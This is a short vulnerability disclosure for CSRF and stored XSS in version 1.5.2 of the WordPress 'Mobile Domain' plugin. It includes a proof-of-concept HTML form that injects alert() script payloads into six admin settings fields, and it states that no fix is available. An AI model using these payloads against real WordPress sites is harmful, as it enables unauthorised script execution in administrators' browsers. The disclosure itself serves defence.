Title: WordPress 'Mobile Domain' CSRF/XSS Version: 1.5.2 Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej Date: 2015/01/26 Download: https://wordpress.org/plugins/mobile-domain/ Contacted WordPress: 2015/01/26 ========================================================== ## Description: ========================================================== Redirect WordPress blog from desktop domain to mobile subdomain and create Mobile XML Sitemap. ## CSRF: ========================================================== It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ========================================================== Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. PoC: Log in as admin and submit this form: <form method="POST" action="http://[URL]/wp-admin/options-general.php?page=mobile-domain&wpmd_action=add-domain"> <input type="text" name="domain" value=""><script>alert(1);</script>"><br /> <input type="text" name="text" value=""><script>alert(2);</script>"><br /> <input type="text" name="font" value=""><script>alert(3);</script>"><br /> <input type="text" name="fontcolor" value=""><script>alert(4);</script>"><br /> <input type="text" name="color" value=""><script>alert(5);</script>"><br /> <input type="text" name="padding" value=""><script>alert(6);</script>"><br /> <input type="submit"> </form> ## Solution ========================================================== No fix available.